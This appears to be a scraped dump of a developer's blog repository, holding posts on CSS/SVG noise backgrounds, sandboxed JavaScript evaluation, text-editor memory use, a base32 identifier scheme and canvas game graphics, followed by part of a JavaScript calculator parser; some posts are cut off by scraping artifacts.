"text": "# Noisy Background Image\n\nFor a long time, I have learned all the techniques to get a random background noise. Now that I believe I master them all and invented a new one, I feel like I can discuss the subject.\n\n## Inserted PNG Image\n\nThe most obvious technique is to rely on Gimp (or Photoshop, or <insert your bitmap image doctoring progam>) to perform the image randomization.\n\n\n\nTo get raw random pixels, you can rely on Hurl noise:\n\n\n\n\n\nIf you fancy smoother random transitions, Perlin noise does the job:\n\n\n\n\n\nYou should play with the opacity slider in order to have something much more discreet.\n\nThen, you need to include the image. You could of course just write this CSS code:\n\n```\nhtml {\n background: url(./img.png);\n}\n```\n\nHowever, it is of better form to include it as base64 data. Having to wait for the browser to notice the image and start downloading it gives the appearance of a slow page load experience. Downloading everything on the go is better, even if base64 data is bigger than raw data, at least until the glorious days of HTTP 2.0 Push (where you'll be able to send the image alongside the web page in a single HTTP response cycle).\n\nHere's a command that outputs your base64 data.\n\n```\nnode -p 'fs = require(\"fs\"); fs.writeFileSync(\"img.png.base64\", fs.readFileSync(\"img.png\", \"base64\"));'\n```\n\nCopy and paste the data here:\n\n```\nhtml {\n background: url(data:image/png;base64,iVBORw0KGgoAA…), black;\n}\n```\n\n\n\nI wish I could link this image to a jsbin that shows the code, but the image data is too large for that. Incidentally, this is an excellent introduction to what comes next.\n\n## Prime Numbers\n\nHaving a large image download is very sad. Fortunately, we can achieve a similar level of pixel noise with two or three small images. A single smaller image gives poor results:\n\n\n\nBut relying on two or three square images whose width is a prime number guarantees that the pattern won't repeat for a very long time. Given two images of size MxM and NxN, with M and N prime numbers, the resulting image won't repeat until MxN. Let's try with M = 13 and N = 23. Then the repetition will only happen at 299. Add to that a 11x11 pixels image and you will get something of size 3289x3289 pixels.\n\nOf course, that is only true of truly random data, which is definitely not the case of Gimp's Hurl, unfortunately. To achieve a better result with better compression, I use a baseline of grey `0x808080`, add an RGB noise (since I use a grayscale color profile, it only changes colors in shades of gray), and put the opacity somewhere close to 5%.\n\n\n\nHere is what we get with 3 images of sizes 11, 13 and 23, all set at 5% opacity:\n\n[](http://jsbin.com/senaqu/1)\n\nThat webpage costs 1978 bytes, compared to 3969 bytes for a single image of 50x50 pixels generated using the same technique, with which repetition would be visible ([example here](http://jsbin.com/pepumo/1)).\n\nOf course, this prime number trick only works for completely random background pixels. I was always dissatisfied that there was no way to have similarly small image downloads for background Perlin noise.\n\nUntil I found a way.\n\n## SVG Filters\n\nIt turns out browsers already have the Perlin noise code in their SVG engines. All that is needed is to generate an SVG image at load time, and assign it to the background. The trick is to use the [Turbulence filter effect](http://www.w3.org/TR/SVG11/filters.html#feTurbulenceElement) with skill. I recommend combining it with a ColorMatrix filter.\n\n (function background() {\n var seed = (Math.random() * 1000)|0;\n var domHtml = document.documentElement;\n var svg = '<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"' + domHtml.clientWidth + '\" height=\"' + domHtml.clientHeight + '\"><filter id=\"a\"><feturbulence basefrequency=\".2\" numoctaves=\"1\" seed=\"' + seed + '\"></feturbulence><fecolormatrix values=\"1 1 1 1 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0.04\"></fecolormatrix></filter><rect width=\"100%\" height=\"100%\" filter=\"url(#a)\"></rect></svg>';\n domHtml.style.backgroundImage = 'url(data:image/svg+xml;base64,' + btoa(svg) + ')';\n }());\n\n[](http://jsbin.com/qihagu/1)\n\nI tend to favor using JS to produce this effect, because this way, we can generate a unique seed on every page load. That said, it is entirely possible to put it in a data URL, as we have done before.\n\nThe [resulting page](http://jsbin.com/qihagu/1) costs a mere 912 bytes, far smaller than our previous experiments with PNG images. And that's with a random seed; it is even smaller (although, not by much, 736 bytes) when inserted directly in the CSS as base64 data.\n\nOf course, the picture above is just an example. There are many more possibilities based on this technique. For instance, here, I use turbulence; I could go for fractal noise. Playing with the number of octaves at high level exposes IEEE-754 errors in the mandatory algorithm, which gives interesting dotted results…\n\n\n\nUsing different base frequencies between the X and Y coordinates gives more surprises. We can further combine this with a rotation to get visible random diagonals. Of course we can also get raw random pixels, as we had before, using a very small base frequency (somewhere around 0.4). Experimenting with the Color Matrix can give stellar results as well, despite its scary appearance.\n\n----\n\nHere you go! Everything you needed to know about noisy background images, including the state-of-the-art in terms of small image download with perfect result.\n\nI already started using this here (which the astute reader will surely have noticed), and on [Aulx](http://espadrine.github.io/aulx), the autocompletion engine for the Web which I'll continue improving in the future. </insert>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-10-22T20:11:00Z\",\n \"keywords\": \"css, svg\" }\n</script>\n"
},
{
"alpha_fraction": 0.7073981761932373,
"alphanum_fraction": 0.7182044982910156,
"avg_line_length": 60.69230651855469,
"blob_id": "182da562a355ea3d3e84bc5aca9a84a9d47e192f",
"content_id": "ce4be5fe2e86d4e62611fdbf3cd9ade1da4e1874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2410,
"license_type": "no_license",
"max_line_length": 442,
"num_lines": 39,
"path": "/blog/src/dont-be-eval.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Don’t be eval()\n\n[TLDR: <https://github.com/espadrine/localeval>]\n\nWe JS programmers know how evil `eval()` is. An attempt at copying the fancy concept of Lisp's metacircular evaluator, it takes a string instead of Lisp's homoiconic quoted syntax tree. Beyond that, unlike Scheme (which allows to specify your own environment), it evaluates the code in the current lexical environment. Consequently, it can mess with all variable bindings in scope, and will leak to the outside world all variables it defines.\n\nI sometimes wondered how I would go about making a fast, safe JS evaluator without relying on something as complicated as Brendan Eich's implementation of JS in JS, [Narcissus](https://github.com/mozilla/narcissus).\nI have [figured it out](https://github.com/espadrine/localeval) recently.\nLet me tell you how.\n\nFirst of all, unlike what many believe, `eval()` is not the only built-in JS function that takes JS code as a string for evaluation. The `Function()` constructor does too. Its last argument contains the code for the body of the function, as a string, and the arguments before that one contain the names of the function's parameters.\n\n var f = Function('a', 'b', 'return a * b');\n console.log(f(6, 7)); // 42\n\nJust like `eval()`, it has destructive access to the surrounding variables.\n\n var n = 0;\n var f = Function('a', 'n++; return a + n');\n console.log([f(3), f(3)]); // 3, 4\n console.log(n); // 2\n\nHaving the ability to create a new function means that we can carefully *construct exactly the environment* that we wish to target, kind of like a green screen in the background, on which you may clip any sandbox (that is, any set of symbol bindings) and run your code on top of it.\n\nBeyond that, it gives you the ability to *shadow access to outside global variables*. Yes, you may literally, with the power of ES5, navigate the full prototype chain of the global object (which you can access with `this` on a non-strict-mode function) and aggregate all the symbols in a huge string that looks like `var foo, bar, …;`!\n\n var reset = 'var ';\n var obj = this;\n var globals;\n while (obj !== null) {\n globals = Object.getOwnPropertyNames(obj);\n for (var i = 0; i </https:>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-06-12T22:21:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7144384980201721,
"alphanum_fraction": 0.7422459721565247,
"avg_line_length": 34.96154022216797,
"blob_id": "9a2ddbc3ad3a7f613ead99f29c2f3c8838f71d20",
"content_id": "63fd1535d0a1e9ff18304c51de1a21736e452213",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 328,
"num_lines": 26,
"path": "/blog/src/low-fat-text-editors.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Low-Fat Text Edtors\n\nMemory-wise, after having run for mild editing, the following text editors take the following amount of RAM:\n\nBrackets: more than 124M\n\nSublime Text: 67M\n\nKate: 44M\n\nEmacs: 16M\n\nVim: 8M\n\nAmazingly, each take twice the memory of the next.\n\n(No add-ons except for vim. Emacs with ido-mode on. All running in GUI mode. All in latest version. All having the same (JS) file opened. Figures rounded. Linux KDE.)\n\nIt is highly likely that Atom will take about the same as Brackets. I don't know how the Vim gods did it, but I would need 15 instances (as in, windows with opened buffer) to take the amount of space Brackets takes. Considering I customized it with most features that Sublime / Brackets users benefit from, picture me impressed.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-03-16T01:12:00Z\",\n \"keywords\": \"editor\" }\n</script>\n"
},
{
"alpha_fraction": 0.7373314499855042,
"alphanum_fraction": 0.7494188547134399,
"avg_line_length": 42.02000045776367,
"blob_id": "e241eb446b07b00e384b7675a1bcac8eebe9508c",
"content_id": "8676186e12518fe945240cfad35f523f1a7e89bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2163,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 50,
"path": "/blog/src/what-i-built-in-2017.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made In 2017\n\nAfter some time working on the collaboration between [Captain Train][] and its\nacquirer [Trainline][], to bring together both companies’ technologies through a\ncommon protocol, and maintaining the SNCF integration through major evolutions\nof their offerings, I left the company to join [Qonto][]\n\nThis bank startup that just came out of beta when I joined (I literally removed\nthe beta tag from the website on my first week) offers the most streamlined\nonline banking experience for businesses.\n\nI brought together a great team. This year, we will focus on making the backend\nbanking integration top-notch.\n\nAs a result, I had less time for free-time open-source. There were three big\ndirections to what I did:\n\n- The [Shields.io][] core team increased, and it allowed us to optimize things\n like the [font-width computation][] (hat tip to Paul Melnikow for that).\n- I pursue [TheFileTree][], to provide the infrastructure for a self-helping\n community of makers. (It is very far from there yet.) I switched it to using\n the [Canop][] system, which I still have to make support a full JSON, to allow\n for more complex apps. I redid the API and made the app system as designed\n the year before.\n- I played with AI in the stride of DeepMind’s [AlphaGo][] effort, and produced\n a Node.js Go library, [badukjs][].\n\nTo sum up, this year, I switched focus from “me” to “us”. Great things are not a\nlonely job, but an active coordination.\n\nNext year, I will focus on building-block infrastructure for more cooperation.\n\n[Previously][].\n\n[Captain Train]: https://trainline.eu\n[Trainline]: https://www.thetrainline.com\n[Qonto]: https://qonto.eu\n[Shields.io]: https://shields.io\n[font-width computation]: https://github.com/badges/shields/pull/1390\n[TheFileTree]: https://thefiletree.com\n[badukjs]: https://github.com/espadrine/badukjs\n[Canop]: https://github.com/espadrine/canop\n[Previously]: http://espadrine.github.io/blog/posts/what-i-made-in-2016.html\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-02-23T21:37:12Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7435601949691772,
"alphanum_fraction": 0.770280659198761,
"avg_line_length": 37.82089614868164,
"blob_id": "d0a11ceef0fa74bff57937d2f9d2d701b8afb6fc",
"content_id": "dfe446a5997ab72ca049abb1300926000f0952b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5226,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 134,
"path": "/blog/src/nato-phonetic-alphabet.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Learning Resource for the NATO Phonetic Alphabet\n\n<iframe src=https://espadrine.github.io/nato-alphabet/\n style='width:100%; height:1000px; border:0'></iframe>\n\nA while back, I wrote [a resource][learn]\nto help me learn the [NATO phonetic alphabet][NATO].\n\n*(Link to [the full website here][learn].)*\n\n## What does this resource do well?\n\nA major aspect of good learning, is the randomization of tests.\n\nWhen you must remember by heart a large number of element,\na common mistake I find in schoolbooks\nis for the exercises to repeat only the past ten new words or so.\n\nIt is critical, to achieve a leveled, continuous learning experience,\nto randomly sample all words previously learnt,\nregardless of how old.\nThat counteracts the inevitable forgetting of short-term-memory words.\n\n*If you can **predict** the words that your memory must remember,\nyou will subconsciously forget the words that won’t appear.*\nWorse, you may link them to the predictable sequence of words\nthat the test is built on,\ncausing you to only remember one word when it is next to the other,\nwhich in real life, it will often not be.\n\nThis principle is noticeably unfollowed in language manuals,\nwith predictable effects on my own learning.\nI was (and am) frustrated to not have tools like these.\n\nGood randomness is critical to healthy knowledge acquisition.\n\nIn fact, many machine learning systems heavily depend on that insight.\nFor instance, [AlphaGo][] carefully randomized the sequence of games\nand the stage of the games that it had to learn,\nto avoid the system from overfitting on one game, or on the late game.\n\n## Why did I want to learn it?\n\nWhen investigating production issues,\ndevelopers and operations managers often have to communicate identifiers\nso they can share their findings.\n\n> — “*Hey, take a look at payment authorization number\n> `78223a6b-6b41-41ac-9cc1-00b76a664ac9`:\n> the amount matches the settlement we are looking for.*”\n\n**Sequential identifiers** are short (at first),\nbut betray information about when the entity was created,\nwhich is often not welcome.\n*Identifiers should never contain potentially secret information.*\n\n**Traditional UUID v4** are not great at transmitting identifiers efficiently,\nespecially vocally.\n\nIndeed, sequences of digits have a higher error rate when vocally transmitted.\nThey are easy to confuse with each other, after all;\nusing a larger glyph set increases distinguishability.\n\n[At work][Qonto], we do have a lot of UUIDs.\nIn many spots in the deeper core of the system, however,\nI opted for **128-bit CSPRNG-produced base64 identifiers**.\nThey are shorter (⌈128÷log2(64)⌉ = 22 characters)\nand harder to mistype.\n\nLooking back, one flaw with those is that it is very hard\nto communicate them vocally.\nYou always end up having to specify uppercase / lowercase.\nEven when mentally copying these IDs on your own,\nyou often use the wrong case.\n\nInstead, **base32** does away with case,\nmaking it very suitable for vocal transmission.\nWhen lowercase, it is even particularly easy to read.\n\nI must not be the only one with that opinion.\nIn fact, in the Bitcoin world,\nthe account number format has been switched from a base58 one,\nto the new [Bech32][] addresses introduced with SegWit.\nBehold, it uses lowercase base32!\n\n> `bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4`\n\nOf course, Bitcoin addresses are still very long.\nToo long to transmit in a single breath.\n\nWe could constrain ourselves to 128 random bits,\nyielding a ⌈128÷log2(32)⌉ = 26-character identifier.\nAs long as the entire alphabet!\n\nThere is a shorter technique:\n\n1. Identifier generator nodes are globally assigned a random 16-bit number.\n2. They all share a 128-bit secret.\n3. They each have a separate 48-bit counter that they increment for each new ID.\n4. Each new identifier is `PRP((nodeID << 48) ^ counter, secret)`,\n where PRP is a 64-bit block cipher, like [Speck64/128][] or XTEA.\n\nSince a block cipher is a [Pseudo-Random Permutation][PRP] (or PRP for short),\nit will cycle through all 64-bit values without repetition.\nThe output will be essentially indistinguishably random,\navoiding leaking information about the identified object.\nAnd a 64-bit number is only 13 characters of base32!\n\n> — “*Hey, take a look at payment authorization number `nhimasuge7f52`:\n> the amount matches the settlement we are looking for.*”\n\nThat, finally, can be easily transmitted using the NATO system.\n\n*(This system is likely overkill, but a fun thought.)*\n\n---\n\n*[Click to comment.][Comments]*\n\n[learn]: https://espadrine.github.io/nato-alphabet/\n[AlphaGo]: https://deepmind.com/blog/article/alphago-zero-starting-scratch\n[NATO]: https://www.nato.int/cps/en/natohq/declassified_136216.htm\n[Qonto]: https://qonto.com/en\n[Bech32]: https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki\n[PRP]: https://en.wikipedia.org/wiki/Pseudorandom_permutation\n[Speck64/128]: https://nsacyber.github.io/simon-speck/\n[Comments]: https://www.reddit.com/r/espadrine/comments/jydh6k/a_learning_resource_for_the_nato_phonetic_alphabet/\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-11-11T19:18:25Z\",\n \"keywords\": \"codes\" }\n</script>\n"
},
{
"alpha_fraction": 0.7407106757164001,
"alphanum_fraction": 0.7530964612960815,
"avg_line_length": 35.48147964477539,
"blob_id": "5ed5254556921f74728c77fe8171636bce4cb1e4",
"content_id": "2978c0a4b61d4062811656395c50b295cbc25aab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4929,
"license_type": "no_license",
"max_line_length": 390,
"num_lines": 135,
"path": "/blog/src/canvas-tricks.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Canvas Tricks\n\nI work on a 4X-style game called Not My Territory (Yet) as a hobby. There are opposing teams with colors attributed to them. They own territory, and therefore have borders.\n\nHowever, making borders look good on the map was always a bit of a challenge.\n\nI wanted them to feel old-school.\n\nI didn't want them to look geometrical.\n\nAnd I needed them to be discrete, so as not to obstruct the view.\n\n\n\n----\n\nFirst, the shape was blocky, because it is the easiest thing to do with hexes:\n\n\n\nThen I smoothed it out with splines, but even that was too regular.\n\n\n\nI added irregularities, which was tricky, since a small change in the border (say, a tile added to it) must not change the shape of the rest of the border.\n\n\n\nI used the algorithm to generate irregularities to draw how far a unit can move in one turn, as well.\n\nBefore:\n\n\n\nAfter:\n\n\n\n(Out of curiosity, here's what the un-splined version looks like, the irregularities are very apparent: I nudge one vertex out of two.)\n\n\n\n----\n\nNext, the border color. After a [Reddit poll][] where I presented [fairly](http://i.imgur.com/t5JH8ma.png) [different](http://i.imgur.com/a6yHLqG.png) [options](http://i.imgur.com/8t5PLL8.png), I settled on this:\n\n\n\nThe tricky bit, this time, is to ensure that borders don't overlap when two nations are right next to each other. To achieve this result, I use canvas clipping, drawing only the inside of the border, after having drawn a full border for each opposing camp. Chrome pixelates the edge of clipped painted data, probably because of its Path implementation, but that's the best solution I found.\n\nAlso, yet again, I ensured that dashed borders didn't change with a small change in the border.\n\nBefore:\n\n\n\n→\n\n\n\nAfter:\n\n\n\n→\n\n\n\nThat was done by putting a dash one out of two consecutive hexagonal edge along the border.\n\n[Reddit poll]: http://www.reddit.com/r/gamedev/comments/2avffd/4x_which_country_border_is_most_pleasing/\n\n----\n\nWhat next? I found the map's shoreline (and all terrain transitions) too harsh and geometric as well.\n\n\n\nI tried to use the same trick as before, irregular splines, but it doesn't work this time.\n\n\n\nI accidentally found out that making my sprite images square gave a surprisingly good random shoreline.\n\n\n\nI added some noisy irregularities to the sprite sheet.\n\n\n\nI added a beach tile in the sprites, and the result is a lot better!\n\n\n\nBefore:\n\n\n\nAfter:\n\n\n\n----\n\nFinally, while it was cool to have [a map the size of a cosmic superbubble](https://www.youtube.com/watch?v=BFSW2FgWQR0), having a game where your enemy can infinitely escape isn't fun. I enclose each new map in a random continent the size of Corsica.\n\n\n\n----\n\nDid I say \"finally\"? This is the last item! I improved the look of the map when unzoomed.\n\nBefore:\n\n\n\nMore recently:\n\n\n\nNow:\n\n\n\nBonus picture, 3D rendering, a fair bit of work with many challenges to come:\n\n\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-10-05T22:41:00Z\",\n \"keywords\": \"game, canvas\" }\n</script>\n"
},
{
"alpha_fraction": 0.5931060910224915,
"alphanum_fraction": 0.5976762175559998,
"avg_line_length": 28.1422119140625,
"blob_id": "e5ea14892f13d44e87850dd53d50d74249cb2060",
"content_id": "f95c389afac02b3c7af22e9f154b7e8f9ffba49b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12926,
"license_type": "no_license",
"max_line_length": 397,
"num_lines": 443,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "let mpf;\nclass Calculator {\n // mpWasm is https://github.com/cag/mp-wasm\n // We make it provided externally to support multiple platforms.\n constructor(mpWasm) {\n this.parser = new Parser();\n this.evaluator = new Evaluator();\n this.mpf = mpf = mpWasm.mpf;\n }\n\n // Returns:\n // - result: a list of MPFR numbers.\n // - tree: the abstract syntax tree representation of the input.\n // - errors: a list of errors in parsing or evaluating the input.\n compute(input) {\n const syntax = this.parser.parse(input);\n if (syntax.errors.length > 0) {\n return { result: null, tree: syntax.tree, errors: syntax.errors };\n }\n const { result, errors } = this.evaluator.eval(syntax.tree);\n return { result, tree: syntax.tree, errors };\n }\n\n // Returns:\n // - tree: the abstract syntax tree representation of the input.\n // - errors: a list of errors in parsing the input.\n parse(input) {\n return this.parser.parse(input);\n }\n}\n\nclass Parser {\n parse(input) {\n const tree = new SyntaxTree(input);\n return { tree, errors: tree.errors };\n }\n}\n\nclass SyntaxTree {\n constructor(input) {\n this.text = input;\n this.cursor = 0;\n this.line = 1;\n this.column = 1;\n this.errors = [];\n this.root = this.parseRoot();\n }\n\n parseRoot() {\n const expr = this.parseExpr();\n this.skipWhitespace();\n if (!this.endReached()) {\n this.addError('Trailing characters');\n }\n return expr;\n }\n\n parseExpr() {\n this.skipWhitespace();\n let node = this.newNode(SyntaxTreeNode.type.expr);\n\n const rest = this.read(this.text.length);\n const type = SyntaxTreeNode.nameFromType.findIndex(type =>\n SyntaxTreeNode.token[type].test(rest));\n let subExpr;\n switch (type) {\n case SyntaxTreeNode.type.number:\n node = this.parseNumber();\n break;\n case SyntaxTreeNode.type.paren:\n node = this.parseParen();\n break;\n case SyntaxTreeNode.type.sep:\n break; // End of the expression.\n case SyntaxTreeNode.type.prefixOp:\n node.type = type;\n node.func = SyntaxTreeNode.funcFromOperator[this.read()];\n this.advance();\n subExpr = this.parseExpr();\n node.children = [subExpr];\n break;\n case SyntaxTreeNode.type.func:\n node = this.parseFunction(type);\n break;\n default:\n this.addError(\"Invalid expression\");\n this.advance();\n }\n this.closeNode(node);\n\n // Infix operators.\n this.skipWhitespace();\n if (SyntaxTreeNode.token.infixOp.test(this.read())) {\n const operator = SyntaxTreeNode.funcFromOperator[this.read()];\n if (!operator) {\n throw new Error(`Invalid operator type ${this.read()}`);\n }\n\n // The expression to return is an infix operation.\n const firstOperand = node;\n\n node = this.newNode(SyntaxTreeNode.type.infixOp);\n node.startAlong(firstOperand);\n node.func = operator;\n this.advance();\n\n const secondOperand = this.parseExpr();\n node.children = [firstOperand, secondOperand];\n\n // Handle associativity.\n if (secondOperand.type === SyntaxTreeNode.token.infixOp &&\n SyntaxTreeNode.operatorAssociativity.get(operator) >\n SyntaxTreeNode.operatorAssociativity.get(secondOperand.func)) {\n // In this situation, we must promote the second operator to toplevel.\n // [firstOperand <operator> [second[0] <secondOperator> second[1]]]\n // → [[firstOperand <operator> second[0]] <secondOperator> second[1]]\n const newFirstOperand = this.newNode(SyntaxTreeNode.type.infixOp);\n newFirstOperand.startAlong(firstOperand);\n newFirstOperand.endAlong(secondOperand.children[0]);\n newFirstOperand.func = operator;\n newFirstOperand.children = [firstOperand, secondOperand.children[0]];\n node.func = secondOperand.func;\n node.children = [newFirstOperand, secondOperand.children[1]];\n }\n this.closeNode(node);\n }\n\n // Postfix operators.\n this.skipWhitespace();\n while (SyntaxTreeNode.token.postfixOp.test(this.read())) {\n const operator = SyntaxTreeNode.funcFromOperator[this.read()];\n if (!operator) {\n throw new Error(`Invalid operator type ${this.read()}`);\n }\n\n // The expression to return is a postfix operation.\n const operand = node;\n this.closeNode(operand);\n\n node = this.newNode(SyntaxTreeNode.type.postfixOp);\n node.startAlong(operand);\n node.func = operator;\n this.advance();\n node.children = [operand];\n this.closeNode(node);\n this.skipWhitespace();\n }\n\n return node;\n }\n\n // Expression of the form \"12.5\"\n parseNumber() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.number);\n\n const rest = this.read(this.text.length);\n const match = SyntaxTreeNode.token.number.exec(rest);\n this.advance(match[0].length);\n node.number = mpf(match[0].replace(/_/g, ''));\n\n this.closeNode(node);\n return node;\n }\n\n // Expression of the form \"(…, …)\"\n parseParen() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.paren);\n\n if (this.read() !== '(') { // We only throw when it should never happen.\n throw new Error(\"Invalid paren does not start with a parenthesis\");\n }\n this.advance();\n\n let closingParenReached = false;\n while (!closingParenReached && this.cursor < this.text.length) {\n this.skipWhitespace();\n node.children.push(this.parseExpr());\n switch (this.read()) {\n case ',':\n this.advance();\n this.skipWhitespace();\n break;\n case ')':\n this.advance();\n closingParenReached = true;\n break;\n default:\n this.addError(\"Invalid character in parenthesized expression\");\n this.advance();\n }\n }\n this.closeNode(node);\n return node;\n }\n\n // Expression of the form \"func(…, …)\"\n parseFunction() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.func);\n\n const rest = this.read(this.text.length);\n const funcMatch = SyntaxTreeNode.token.func.exec(rest);\n if (funcMatch == null) {\n throw new Error(\"Invalid function name\");\n }\n node.func = funcMatch[0];\n this.advance(node.func.length);\n this.skipWhitespace();\n if (this.read() !== '(') {\n this.addError(\"Invalid function with no parameters\");\n this.advance();\n this.closeNode(node);\n return node;\n }\n const args = this.parseParen();\n node.children = args.children;\n\n this.closeNode(node);\n return node;\n }\n\n // Read the next n characters.\n read(n = 1) {\n return this.text.slice(this.cursor, this.cursor + n);\n }\n\n // Advance the cursor by n characters.\n advance(n = 1) {\n for (let i = this.cursor; i < this.cursor + n; i++) {\n if (this.text[i] === '\\n') {\n this.line++;\n this.column = 1;\n } else {\n this.column++;\n }\n }\n this.cursor += n;\n }\n\n skipWhitespace() {\n while (/^[ \\t\\n]/.test(this.read())) {\n this.advance();\n }\n }\n\n endReached() {\n return this.cursor >= this.text.length;\n }\n\n newNode(type) {\n return new SyntaxTreeNode(\n type, this.cursor, this.cursor + 1, this.line, this.column, this.text);\n }\n\n closeNode(node) {\n node.end = this.cursor;\n node.endLine = this.line;\n node.endColumn = this.column;\n node.text = this.text.slice(node.start, node.end);\n }\n\n addError(message) {\n this.errors.push(new SyntaxTreeError(message, this.line, this.column));\n }\n\n toString() {\n return this.root.toString();\n }\n}\n\nclass SyntaxTreeNode {\n constructor(type, start, end, startLine, startColumn, text) {\n this.type = type;\n this.text = text;\n this.children = [];\n this.func = null;\n this.number = null;\n this.start = start;\n this.end = end;\n this.startLine = this.endLine = startLine;\n this.startColumn = this.endColumn = startColumn;\n }\n\n startAlong(node) {\n this.start = node.start;\n this.startLine = node.startLine;\n this.startColumn = node.startColumn;\n }\n\n endAlong(node) {\n this.end = node.end;\n this.endLine = node.endLine;\n this.endColumn = node.endColumn;\n }\n\n // Returns:\n // - result: a list of MPFR numbers.\n // - errors: a list of errors in evaluating the node.\n eval() {\n const childrenEval = this.children.map(c => c.eval());\n const childrenValues = childrenEval.map(c => c.result)\n .reduce((list, val) => list.concat(val), []);\n const result = [], errors = [];\n let operator;\n switch (this.type) {\n case SyntaxTreeNode.type.root:\n case SyntaxTreeNode.type.expr:\n result.push(mpf(0));\n break;\n case SyntaxTreeNode.type.number:\n result.push(mpf(this.number || 0));\n break;\n case SyntaxTreeNode.type.paren:\n case SyntaxTreeNode.type.sep:\n result.push(...childrenValues);\n break;\n case SyntaxTreeNode.type.prefixOp:\n switch (this.func) {\n case \"add\":\n case \"sub\":\n result.push(mpf[this.func](0, childrenValues[0]));\n break;\n default:\n throw new Error(`Invalid prefix operator ${this.func}`);\n }\n break;\n case SyntaxTreeNode.type.infixOp:\n result.push(childrenValues.reduce((sum, arg) => sum[this.func](arg)));\n break;\n case SyntaxTreeNode.type.postfixOp:\n if (!mpf[this.func]) {\n throw new Error(`Invalid postfix operator ${this.func}`);\n }\n if (this.func === 'fac') {\n // The factorial function is nonfunctional in mp-wasm,\n // see https://github.com/cag/mp-wasm/issues/3\n result.push(mpf.gamma(childrenValues[0].add(1)));\n } else {\n result.push(mpf[this.func](childrenValues[0]));\n }\n break;\n case SyntaxTreeNode.type.func:\n operator = {\n \"ln\": \"log\",\n \"round\": \"rintRound\",\n \"floor\": \"rintFloor\",\n \"ceil\": \"rintCeil\",\n \"trunc\": \"rintTrunc\",\n }[this.func] || this.func;\n result.push(mpf[this.func](...childrenValues));\n break;\n default:\n throw new Error(\"Invalid evaluation \" +\n \"of nonexistent node type \" + this.type);\n }\n childrenEval.forEach(c => errors.push(...c.errors));\n return { result, errors };\n }\n\n toString() {\n const info =\n (this.type === SyntaxTreeNode.type.number)? this.number + ' ':\n (this.type === SyntaxTreeNode.type.prefixOp ||\n this.type === SyntaxTreeNode.type.infixOp ||\n this.type === SyntaxTreeNode.type.postfixOp ||\n this.type === SyntaxTreeNode.type.func)? this.func + ' ':\n '';\n const curText =\n `${this.startLine}:${this.startColumn}-` +\n `${this.endLine}:${this.endColumn} ` +\n `${SyntaxTreeNode.nameFromType[this.type]} ` +\n `${info}${JSON.stringify(this.text)}`;\n const childrenText = this.children.map(c =>\n c.toString().split('\\n')\n .map(line => ` ${line}`)\n .join('\\n'))\n .join('\\n');\n return curText + ((this.children.length > 0)? `\\n${childrenText}`: \"\");\n }\n}\n\nclass SyntaxTreeError {\n constructor(message, line, column) {\n this.message = message;\n this.line = line;\n this.column = column;\n }\n toString() {\n return `${this.line}:${this.column}: ${this.message}`;\n }\n}\n\n// Node types.\nSyntaxTreeNode.type = {\n root: 0,\n expr: 1,\n number: 2,\n paren: 3,\n sep: 4,\n prefixOp: 5,\n infixOp: 6,\n postfixOp: 7,\n func: 8,\n};\nSyntaxTreeNode.nameFromType = Object.keys(SyntaxTreeNode.type);\n\nSyntaxTreeNode.token = {\n root: new RegExp(\"[]\"),\n expr: new RegExp(\"[]\"),\n number: /^[0-9_]+(\\.[0-9_]+)?([eE][0-9_]+)?/,\n paren: /^\\(/,\n sep: /^,/,\n prefixOp: /^[+-]/,\n infixOp: /^([+\\-*×/÷%^]|\\*\\*)/, // If you add an operator, add its precedence in operatorAssociativity.\n postfixOp: /^[!]/,\n func: 